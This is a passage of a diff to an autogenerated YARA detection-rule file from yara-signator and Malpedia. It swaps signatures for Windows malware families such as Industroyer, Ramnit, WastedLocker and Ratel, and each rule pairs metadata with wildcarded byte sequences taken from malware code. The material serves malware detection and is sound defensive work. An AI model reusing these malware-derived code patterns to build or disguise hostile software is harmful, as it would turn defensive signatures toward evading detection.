+rule MALPEDIA_Win_Khrat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b70a6e6b-a7b3-5905-a2f3-bca4eedf28ac"
+		id = "d98fbdf3-9fe4-57f4-bc2e-25361c02b6b3"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.industroyer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.industroyer_auto.yar#L1-L392"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.khrat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.khrat_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "d3f1f022d180cc54e73fc2b0f9206b38d6547f8fb0af0d5f384afd232c2b0a2b"
+		logic_hash = "f897e4b10c9d307944a08dbe843650aba78831f11c2fc81a4d9a80e6f47607a3"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -105756,62 +106204,32 @@ rule MALPEDIA_Win_Industroyer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 53 ff75fc e8???????? 57 e8???????? 83c414 56 }
-		$sequence_1 = { 8d85f8fdffff 56 be04010000 56 50 68???????? }
-		$sequence_2 = { 8d45f4 50 56 57 53 ff15???????? 037df4 }
-		$sequence_3 = { 53 ffd6 53 e8???????? 59 85c0 }
-		$sequence_4 = { 68???????? 56 56 ff15???????? 57 8bf0 e8???????? }
-		$sequence_5 = { 50 6a02 56 e8???????? ff7710 6a03 56 }
-		$sequence_6 = { 8d45a8 33f6 57 50 e8???????? }
-		$sequence_7 = { 51 50 56 57 ff15???????? 56 e8???????? }
-		$sequence_8 = { 6a02 ff15???????? 8bd8 85db 0f849d000000 8d85d0fdffff c785d0fdffff2c020000 }
-		$sequence_9 = { ff15???????? 89849da0efffff 83c604 43 81fe88000000 7291 }
-		$sequence_10 = { 8b35???????? 0f1f00 f644241810 7451 }
-		$sequence_11 = { e8???????? 83c404 33c0 eb19 8d8d90efffff 51 }
-		$sequence_12 = { 81ec6c040000 a1???????? 33c4 89842468040000 53 8b1d???????? }
-		$sequence_13 = { 8b35???????? 39bdd8fdffff 741f 8d85d0fdffff 50 53 }
-		$sequence_14 = { 6800020000 8d85a0fbffff 50 56 ffb59cf3ffff ff15???????? 8b3d???????? }
-		$sequence_15 = { 0f847bffffff ffb59cf3ffff ffd7 8b4dfc 5f 33cd }
-		$sequence_16 = { 89442444 8b442418 89442440 8d44243c 50 }
-		$sequence_17 = { 8bcb 50 e8???????? 83c408 8d95d8fffeff 8bf0 }
-		$sequence_18 = { c745e0d4ff4000 e9???????? c745dc03000000 c745e0e0ff4000 e9???????? 83e80f 7451 }
-		$sequence_19 = { eb07 8b0cc5dc084100 894de4 85c9 }
-		$sequence_20 = { 7417 68???????? 50 ff15???????? 85c0 7407 6a00 }
-		$sequence_21 = { 7464 68???????? ff35???????? c705????????01000000 c705????????04000000 c705????????00000000 c705????????00000000 }
-		$sequence_22 = { 80480c01 eb04 80600cfe 807d1000 8b4604 }
-		$sequence_23 = { 8b4508 dd00 ebc6 c745e0e8ff4000 e9???????? c745e0f0ff4000 e9???????? }
-		$sequence_24 = { 8b34cd18c20110 8b4d08 6a5a 2bce 5b 0fb70431 663bc7 }
-		$sequence_25 = { 75f9 8d7c2430 2bd6 4f 8a4701 47 84c0 }
-		$sequence_26 = { 8945dc 8b1c9dd01f0210 895de0 f6441a2848 8b5d08 0f84ce000000 }
-		$sequence_27 = { c7825402000000000000 c7825802000000000000 8b8350020000 898250020000 8b8354020000 }
-		$sequence_28 = { f6470280 760d 68???????? e8???????? 83c404 }
-		$sequence_29 = { 0f1f440000 8a02 42 84c0 75f9 8d7c2430 2bd6 }
-		$sequence_30 = { 660f59f5 660f28aa40fe4000 660f54e5 660f58fe }
-		$sequence_31 = { e9???????? 894ddc c745e0d8ff4000 e9???????? }
-		$sequence_32 = { 33c2 2500800000 83f800 0f8547ffffff e9???????? 8b542408 }
-		$sequence_33 = { 59 8bf0 6a01 8bce e8???????? 8d45f8 c706???????? }
-		$sequence_34 = { 88d8 e2d9 8dbe00000600 8b07 09c0 }
-		$sequence_35 = { 83eb01 741e 83eb01 7549 399ffc000000 7441 }
-		$sequence_36 = { 894e10 e8???????? 59 59 85c0 }
-		$sequence_37 = { ba05000000 8d0d905b4400 e9???????? a90000f07f 752c a9ffff0f00 }
-		$sequence_38 = { 773c 2b4334 99 f77d8c 894598 3b4b3c }
-		$sequence_39 = { 7451 8b7d08 8b4514 8b4d10 }
+		$sequence_0 = { 7415 ff35???????? e8???????? c705????????00000000 833d????????ff 7415 ff35???????? }
+		$sequence_1 = { 0fb64306 a3???????? 8d7307 56 68???????? e8???????? 6a00 }
+		$sequence_2 = { e8???????? eb0f 807b06ff 7509 8b4b07 51 e8???????? }
+		$sequence_3 = { 50 8d8500fcffff 50 6801000080 e8???????? }
+		$sequence_4 = { c6430500 c6430600 894307 8d7b0b }
+		$sequence_5 = { 66c746326500 66c746347700 66c746363a00 66c746380000 8db500feffff }
+		$sequence_6 = { 8d8500fcffff 50 e8???????? 6a00 51 8d8500fcffff 50 }
+		$sequence_7 = { e8???????? 0bc0 0f84da000000 d1e0 8985fcfbffff ffb5fcfbffff }
+		$sequence_8 = { c9 c3 55 8bec 81c490fbffff }
+		$sequence_9 = { c9 c3 55 8bec 81c4f8fbffff 8d9d00fcffff }
 
 	condition:
-		7 of them and filesize < 983040
+		7 of them and filesize < 57344
 }
-rule MALPEDIA_Win_Lpeclient_Auto : FILE
+rule MALPEDIA_Win_Downeks_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "74413435-5011-52f6-9527-2aa5c727e8b5"
+		id = "c1af7457-a967-5afd-afe7-3e5e1a0a9026"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lpeclient"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lpeclient_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.downeks"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.downeks_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "b5d510f66f1063fb0bc5e208227e246c4a78a2503ab8649007e1796f9f802e10"
+		logic_hash = "2a5314b1c911549ae340f3f5ef76252cb23ca35ba95d30c0718999dad54c01d3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -105825,32 +106243,32 @@ rule MALPEDIA_Win_Lpeclient_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488d5c3e04 b8fcffffff 2bc7 8b7c2430 03f8 81ff00100000 }
-		$sequence_1 = { 488d05ddf80000 483947f0 7412 488b0f 4885c9 740a }
-		$sequence_2 = { c7450c74006900 c745106f006e00 c745143a002000 c745184b006500 c7451e70002d00 c7452241006c00 }
-		$sequence_3 = { 488d0518f90000 483bc8 741a 83b96001000000 7511 e8???????? 488b8b58010000 }
-		$sequence_4 = { 4c8d0da1fd0000 33c0 498bd1 448d4008 3b0a 742b ffc0 }
-		$sequence_5 = { 48c1e814 488d0dbfd2ffff 83e00f 339481a0a40100 }
-		$sequence_6 = { 488bcf ff15???????? 488b8c2400030000 4833cc e8???????? 488b9c2420030000 }
-		$sequence_7 = { 7508 42807c120122 7427 41ffc0 48ffc2 443bc1 }
-		$sequence_8 = { 33d2 48f7d1 83e903 85c9 7e1c 6690 42803c123a }
-		$sequence_9 = { 0f84b8010000 488d2d15e70000 41bc14030000 4c8d0528800000 488bcd 418bd4 e8???????? }
+		$sequence_0 = { 8bec 817d08c8000000 53 56 8bf0 8b9e38040000 57 }
+		$sequence_1 = { c3 b8042c0804 5d c3 b8ec250804 5d c3 }
+		$sequence_2 = { c20c00 8bc1 ddd8 894dd8 81e1ffffff7f 8955cc 894dd0 }
+		$sequence_3 = { 8b7d08 8bc7 c1f805 8bf7 83e61f c1e606 033485e0ffb405 }
+		$sequence_4 = { 8bbd48ffffff 039d68ffffff c1ef03 33f7 03f3 03b544ffffff 897584 }
+		$sequence_5 = { b820000000 8bce e8???????? 33c0 5f 5e 5b }
+		$sequence_6 = { 8d5df0 8b5508 893a 393b 0f8598000000 56 e8???????? }
+		$sequence_7 = { c746140f000000 c7461000000000 6839ac0804 8bce c60600 e8???????? eb7a }
+		$sequence_8 = { c78550ffffff01000000 89b7a0040000 394d98 7c12 7f08 8b5594 3b558c }
+		$sequence_9 = { 6a3f 85c0 7403 40 eb09 8b55e8 8b8298000000 }
 
 	condition:
-		7 of them and filesize < 289792
+		7 of them and filesize < 1318912
 }
-rule MALPEDIA_Win_Collectorgoomba_Auto : FILE
+rule MALPEDIA_Win_Rover_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "030c7bf4-8b0d-51f1-a0c7-6787c27c5097"
+		id = "451be843-c1b6-533c-b0b3-7d3bb00747ec"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.collectorgoomba"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.collectorgoomba_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rover"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rover_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "da75c37e8b44a581ccdac242b61ed90697e0dec4be3fbb969cde47a5043e7eae"
+		logic_hash = "31c11b80e1502485f7e7215f291e9c4bbf44558d14836234edb24070e18bf1ca"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -105864,32 +106282,32 @@ rule MALPEDIA_Win_Collectorgoomba_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff30 ff7508 e8???????? 59 59 898504ffffff 6af7 }
-		$sequence_1 = { 8b45f4 c1e803 8b4d08 8b4954 0fb60401 8b4df4 83e107 }
-		$sequence_2 = { ff75fc e8???????? 83c410 ff75c8 ff7588 6a7a ff75fc }
-		$sequence_3 = { ff702c ff7508 e8???????? 83c40c ff75f4 6a24 ff75fc }
-		$sequence_4 = { ff750c ff75e8 ff75e4 e8???????? 83c414 8b4df4 64890d00000000 }
-		$sequence_5 = { ff15???????? 59 8b4514 83e002 7421 ff7518 8b4514 }
-		$sequence_6 = { ffb594feffff ffb590feffff e8???????? 83c40c c645fc23 8d8d54fcffff e8???????? }
-		$sequence_7 = { ff75f8 e8???????? 83c418 33c0 40 e9???????? 8b450c }
-		$sequence_8 = { ffb558ffffff ffb554ffffff 8b4508 ff30 e8???????? 83c418 8945d0 }
-		$sequence_9 = { ffb518ffffff 8d8500fdffff 50 e8???????? 83c40c 898514ffffff 8b8514ffffff }
+		$sequence_0 = { 7478 8b4c2474 8d442434 50 68ff3f0000 8d83f4050000 50 }
+		$sequence_1 = { eb03 83c604 56 ff15???????? 33c9 83c404 84c0 }
+		$sequence_2 = { 8b0d???????? 50 51 6a02 6a1c 8d9424dc000000 52 }
+		$sequence_3 = { 8b5b10 8b44241c 8d4bfc 3bc1 745c 8928 83c004 }
+		$sequence_4 = { eb6a 80bc241d01000000 7409 51 ff15???????? eb57 80bc241e01000000 }
+		$sequence_5 = { 85c0 740c 8b0d???????? 8b5140 50 ffd2 8d442428 }
+		$sequence_6 = { 83beb000000000 0f846d030000 83bb5802000000 742c 83bb4087000000 7523 8b8e94000000 }
+		$sequence_7 = { 33ff 837d3805 89442410 894c2414 897c240c 750e 8bc6 }
+		$sequence_8 = { 897c2424 83ffff 0f84e8060000 8b2d???????? }
+		$sequence_9 = { ff25???????? 8d8d48ffffff ff25???????? 8b542408 8d8230ffffff 8b8a2cffffff 33c8 }
 
 	condition:
-		7 of them and filesize < 1400832
+		7 of them and filesize < 704512
 }
-rule MALPEDIA_Win_Nosu_Auto : FILE
+rule MALPEDIA_Win_Mulcom_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "44d00c94-691a-5086-98b8-273bd29fa9af"
+		id = "796c69f9-5b53-545d-88e3-bfd165a4b278"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nosu"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nosu_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mulcom"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mulcom_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "83643ba3003fff83421e0f7b019711e99b216991f08f5d871e4aa2d5ab6fc03f"
+		logic_hash = "2762a73c90997100242e2050e0b97b2b7a616be77c2385bca6805b6497e289e6"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -105903,32 +106321,32 @@ rule MALPEDIA_Win_Nosu_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f8455010000 8d442438 50 8d442424 50 6a02 6a01 }
-		$sequence_1 = { 50 6a00 8d54246c e8???????? 83c40c 84c0 0f8477020000 }
-		$sequence_2 = { 33d2 8bcb ff742420 55 56 ff74242c 56 }
-		$sequence_3 = { 8844240a 84c0 7416 b201 8bce e8???????? 8b4514 }
-		$sequence_4 = { 399688010000 7432 3996d8050000 742a 8b8ef8070000 ff7514 }
-		$sequence_5 = { 8d86e0020000 85c0 740d 6a5c 59 }
-		$sequence_6 = { 89b658080000 50 56 b201 8bcf e8???????? 83c414 }
-		$sequence_7 = { 83c520 55 6a08 ff15???????? 50 ff15???????? }
-		$sequence_8 = { c9 c3 57 8bfa 3b4c2408 740d 8bd1 }
-		$sequence_9 = { 83c01e 03c7 0101 ff414c 8d4c2418 e8???????? 5f }
+		$sequence_0 = { ff15???????? b801000000 488b8d70050000 4833cc e8???????? 4c8d9c2480060000 498b5b28 }
+		$sequence_1 = { 488d4b27 4883c8ff 483bcb 480f46c8 e8???????? 488bc8 4885c0 }
+		$sequence_2 = { 488d4398 483bc6 75c8 488b5c2430 488b4c2440 482bcb 48b80dc3300cc3300cc3 }
+		$sequence_3 = { 0f86cd000000 8bc6 4c8d3440 4c8b7c2438 4c8d4dff }
+		$sequence_4 = { 488b03 48634804 4803cb 4533c0 8bd7 e8???????? 90 }
+		$sequence_5 = { 488d4c2440 e8???????? 488d5530 48837d4810 480f435530 8b5d40 448bc3 }
+		$sequence_6 = { eb73 4c8d442430 ba0e000000 488bcf ff15???????? 85c0 750b }
+		$sequence_7 = { 55 488bec 4883ec70 488b05???????? 4833c4 488945f0 488955d0 }
+		$sequence_8 = { 498b4110 d020 c3 81fa80000000 731e 4183f804 7318 }
+		$sequence_9 = { 751f 488b0d???????? 488d1d55e80200 483bcb 740c e8???????? 48891d???????? }
 
 	condition:
-		7 of them and filesize < 513024
+		7 of them and filesize < 867328
 }
-rule MALPEDIA_Win_Pteranodon_Auto : FILE
+rule MALPEDIA_Win_Ratel_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "72fb35bc-9b29-55b2-a918-b3f0192a8f01"
+		id = "3659af5a-6903-5ae8-965b-97a9526108b3"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pteranodon"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pteranodon_auto.yar#L1-L175"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratel"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ratel_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "563c856f09bd2595e0a91450a96a721d247fe131fa027b2937b641124422f09c"
+		logic_hash = "89a6fc619b74a1abf97d7e9ad932eeb9075f956a974cadff963b35627fbf078a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -105942,38 +106360,32 @@ rule MALPEDIA_Win_Pteranodon_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83f81d 7cf1 eb07 8b0cc584d70210 894de4 85c9 7455 }
-		$sequence_1 = { 8bcb e8???????? 83c41c 8d85a8f6ffff 50 6802020000 ff15???????? }
-		$sequence_2 = { 6a00 6a00 56 68???????? ff15???????? 56 e8???????? }
-		$sequence_3 = { 8b049de0874300 8b4de0 f644082801 7515 }
-		$sequence_4 = { ff5018 8b5dd0 83e800 7409 83e801 }
-		$sequence_5 = { e8???????? 68???????? 8d95a8f8ffff c645fc12 8d8d60f8ffff }
-		$sequence_6 = { 894df8 8b048de0874300 33c9 41 897df0 }
-		$sequence_7 = { eb0e 6a06 c74634789f4200 59 c6463c00 5f 894e38 }
-		$sequence_8 = { c785fcfeffff6f002e00 c78500ffffff72007500 e8???????? 6800010000 8bf8 }
-		$sequence_9 = { 83c408 83f8ff bbffffffff 0f455d08 eb06 8b4dec }
-		$sequence_10 = { c685d8f8ffff00 e8???????? 8d85d8f8ffff c645fc22 50 }
-		$sequence_11 = { e8???????? 8bc8 83c404 894de8 8b01 }
-		$sequence_12 = { 8b55ec 8d45d8 8b4dd8 83fa10 8b75d4 0f43c1 2bf0 }
-		$sequence_13 = { 663b88e0e60210 740d 83c002 83f814 72ef 33c0 40 }
-		$sequence_14 = { 6a06 6a01 6a02 8b00 }
-		$sequence_15 = { 68???????? 56 ff15???????? 68b0000000 8d853cffffff 6a00 50 }
+		$sequence_0 = { c705????????080e4c00 e8???????? 83ec08 b9???????? c705????????01000000 c705????????94154c00 c705????????00000000 }
+		$sequence_1 = { 8b510c 31c0 395108 0f82dafeffff 8b01 ff5024 89c2 }
+		$sequence_2 = { 8b5c2420 395808 0f8c51020000 8b442454 8b4c2420 8b4004 39c8 }
+		$sequence_3 = { 8b4508 8b550c 890c24 8d4de0 8945d0 8955d4 e8???????? }
+		$sequence_4 = { 8d5601 89d8 89530c e8???????? 89c1 890c24 e9???????? }
+		$sequence_5 = { 8d7810 83c004 c744243200000000 890424 89542426 31d2 6689542436 }
+		$sequence_6 = { e9???????? 8b01 ff5024 89c3 83f8ff 0f8522fbffff c7450800000000 }
+		$sequence_7 = { 8b470c 894c2410 8b00 890424 e8???????? 8b4c2410 85c0 }
+		$sequence_8 = { e8???????? 50 891c24 e8???????? 85ff 7408 893c24 }
+		$sequence_9 = { 894dcc 8d4de7 8945c4 668945d2 e8???????? 83ec08 807de700 }
 
 	condition:
-		7 of them and filesize < 499712
+		7 of them and filesize < 2174976
 }
-rule MALPEDIA_Win_Joao_Auto : FILE
+rule MALPEDIA_Win_Wastedlocker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a574fe28-a1f8-553e-b910-02d4312c2eca"
+		id = "1b25ab78-4d17-5567-bfe5-7c9cd4852d3a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.joao"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.joao_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wastedlocker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.wastedlocker_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "26a2c27da2ce5891d333b17daccfb50c0846c7c8910a76f91916cef0b5d7e33f"
+		logic_hash = "2c12d9ce655c1e066154e40493d5fbd7e9ce57fd1e7f44c9306209ae45654264"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -105987,34 +106399,34 @@ rule MALPEDIA_Win_Joao_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 83c404 c705????????0f000000 891d???????? 881d???????? 8b4df4 64890d00000000 }
-		$sequence_1 = { 5d c20c00 68???????? 53 e8???????? }
-		$sequence_2 = { 83c004 8955d0 8945cc 3bd1 }
-		$sequence_3 = { e8???????? 8845d4 c745fc01000000 84c0 0f84dc000000 8b16 8d4de4 }
-		$sequence_4 = { 50 e8???????? 83c414 8b4508 c1e005 03c3 83e7e0 }
-		$sequence_5 = { c1e005 03c3 83e7e0 03fb 894608 897e04 891e }
-		$sequence_6 = { 52 6a40 6a20 68???????? ff15???????? }
-		$sequence_7 = { 83ec08 53 56 8b7510 33c0 }
-		$sequence_8 = { 8bc6 2bc7 5f 5e 5b 5d c20c00 }
-		$sequence_9 = { 897dfc e8???????? 8d55f8 52 8bce c745f808000000 }
+		$sequence_0 = { 6a2a e8???????? 8b45fc 8b30 }
+		$sequence_1 = { 5b 7504 8365fc00 8b4508 ff30 ff15???????? 8b45fc }
+		$sequence_2 = { 8bc7 351ec34eee 50 53 e8???????? }
+		$sequence_3 = { ff15???????? 85c0 740f 6a02 57 ff15???????? }
+		$sequence_4 = { 51 8935???????? 8935???????? a3???????? a3???????? }
+		$sequence_5 = { e8???????? 8d85d0f3ffff 50 56 8d85b8edffff 50 8d85b0ebffff }
+		$sequence_6 = { 8918 33f6 eb26 ff15???????? 53 6a00 ff35???????? }
+		$sequence_7 = { 03c7 13cb a3???????? 0bc1 890d???????? 0f8456010000 8b4dfc }
+		$sequence_8 = { ff7508 e8???????? 2b4d08 8bf0 03f1 eb02 8bf1 }
+		$sequence_9 = { ff750c 6a00 ff35???????? ff15???????? 8b45f0 5f 5e }
 
 	condition:
-		7 of them and filesize < 2867200
+		7 of them and filesize < 147456
 }
-rule MALPEDIA_Win_Unidentified_023_Auto : FILE
+rule MALPEDIA_Win_Rikamanu_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1400fef8-22ab-55d3-be00-2034b5c77506"
+		id = "6aa1bb34-6dad-5a44-a7b0-10e6f22d5ad7"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_023"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_023_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rikamanu"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rikamanu_auto.yar#L1-L301"
 		license_url = "N/A"
-		logic_hash = "967009d10509388ccde45cabcb9706cb7743d93f422192cdf1b0f418e7706b0c"
+		logic_hash = "bec31db5b7da98c4f1592bb94bd04c2338666fc78eaa33ae09c8491dda001ca5"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -106026,34 +106438,53 @@ rule MALPEDIA_Win_Unidentified_023_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { b8cccccccc f3ab a1???????? 8945e4 8b0d???????? }
-		$sequence_1 = { 894df4 8a15???????? 8855f8 837d0c01 7514 8bf4 }
-		$sequence_2 = { 8855f8 837d0c01 7514 8bf4 68???????? ff15???????? }
-		$sequence_3 = { 8a15???????? 8855f8 837d0c01 7514 8bf4 }
-		$sequence_4 = { 8855f8 837d0c01 7514 8bf4 68???????? ff15???????? 3bf4 }
-		$sequence_5 = { 0909 0909 0407 0807 8d4900 4f }
-		$sequence_6 = { 68???????? ff15???????? 3bf4 e8???????? b801000000 52 8bcd }
-		$sequence_7 = { b938000000 b8cccccccc f3ab a1???????? 8945e4 8b0d???????? }
-		$sequence_8 = { 0909 0909 0909 0407 0807 8d4900 4f }
-		$sequence_9 = { 8945f0 8b0d???????? 894df4 8a15???????? 8855f8 837d0c01 }
+		$sequence_0 = { e8???????? 6a14 ff15???????? a801 }
+		$sequence_1 = { 50 ff15???????? 8b35???????? 3d80969800 }
+		$sequence_2 = { 40 3acb 75f9 57 8dbdf4fdffff 2bc2 4f }
+		$sequence_3 = { 8d4c2414 51 56 ff15???????? 8b542414 52 }
+		$sequence_4 = { 0fb6da f68321ae400004 740c ff01 85f6 }
+		$sequence_5 = { 33c0 890d???????? bf???????? 890d???????? 890d???????? 890d???????? }
+		$sequence_6 = { 7423 83c604 803e00 7587 53 57 ff15???????? }
+		$sequence_7 = { 58 668986b8000000 668986be010000 c74668b02f4100 83a6b803000000 6a0d }
+		$sequence_8 = { 83d8ff 85c0 0f841f020000 83c9ff }
+		$sequence_9 = { e8???????? 59 3bc3 7511 391d???????? 7509 ff750c }
+		$sequence_10 = { 59 8b7508 8d34f570902400 391e 7404 8bc7 eb6d }
+		$sequence_11 = { 33c5 8945fc 8b0d???????? 53 6804010000 33db 8d85f8feffff }
+		$sequence_12 = { 888800962400 40 ebe9 33c0 8945e4 3d00010000 7d10 }
+		$sequence_13 = { 8b842470020000 03f8 57 56 ff15???????? 5f 5e }
+		$sequence_14 = { ff15???????? 8b8df0fdffff 8b35???????? 51 ffd6 8b95e8fdffff 52 }
+		$sequence_15 = { ff35???????? ff15???????? c3 ff35???????? ff742408 }
+		$sequence_16 = { f3a5 8bca 83e103 f3a4 8dbc243c020000 83c9ff f2ae }
+		$sequence_17 = { 7229 f3a5 ff2495d85a4000 8bc7 ba03000000 83e904 720c }
+		$sequence_18 = { ffd6 85c0 74c2 8b85ccfdffff 6aff }
+		$sequence_19 = { f3a5 8bca 6880000000 83e103 6a04 f3a4 }
+		$sequence_20 = { 52 ff15???????? 8b8c2470020000 8bf8 8d442414 }
+		$sequence_21 = { 53 56 6a01 68???????? e8???????? 6a01 }
+		$sequence_22 = { e8???????? 68ff000000 8d85e9f9ffff 889de8f9ffff 53 50 e8???????? }
+		$sequence_23 = { 50 a3???????? e8???????? 8db67c774000 bf???????? a5 a5 }
+		$sequence_24 = { c1f905 83e21f 8b0c8de0b84000 f644d10401 7425 50 e8???????? }
+		$sequence_25 = { 83c9ff 33c0 8b1d???????? f2ae f7d1 6a00 }
+		$sequence_26 = { 55 6803000010 57 ffd6 3b442410 0f8584040000 b940000000 }
+		$sequence_27 = { ff7510 50 ff7508 ff15???????? 5e 5d c21000 }
+		$sequence_28 = { 56 57 8b7d0c 85db 0f84b2000000 85ff 0f84aa000000 }
 
 	condition:
-		7 of them and filesize < 1433600
+		7 of them and filesize < 212992
 }
-rule MALPEDIA_Win_Ramnit_Auto : FILE
+rule MALPEDIA_Win_Darkpulsar_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e7231016-af2a-574e-9bee-456d68202102"
+		id = "3d640e6f-45ff-5f50-abb3-96bc1483119a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramnit"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ramnit_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkpulsar"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.darkpulsar_auto.yar#L1-L456"
 		license_url = "N/A"
-		logic_hash = "a205fea822a311ab889bb108ee1640be8e7bb55400366f3eef4a7d603b69a5db"
+		logic_hash = "e92897322c1f7ba92ed602b9b405ecfc3237bf769ff600554b34202d8fb12746"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -106065,34 +106496,73 @@ rule MALPEDIA_Win_Ramnit_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b7d08 b000 f2ae 8bc1 }
-		$sequence_1 = { 5f 59 5a 5b c9 c20800 55 }
-		$sequence_2 = { fd 8b4d10 8b7d0c 8b7508 f3a4 }
-		$sequence_3 = { 3a4510 7407 b800000000 eb02 8bc7 5a }
-		$sequence_4 = { ba00000000 59 5f 5e 5b c9 }
-		$sequence_5 = { ff7514 ff7510 e8???????? 83f800 750b 4f 3b7d08 }
-		$sequence_6 = { fc 8b4d0c 8b7d08 b000 f3aa }
-		$sequence_7 = { 52 8b4508 8b5d0c 4b 23d8 83fb00 740e }
-		$sequence_8 = { 8bf8 037d14 3b7df8 771f 8945fc ff7514 ff7510 }
-		$sequence_9 = { 8bec 83c4f8 56 57 51 53 52 }
+		$sequence_0 = { c21000 ff25???????? ff25???????? ff25???????? 33c0 40 }
+		$sequence_1 = { 33c0 40 c20c00 68???????? 64ff3500000000 }
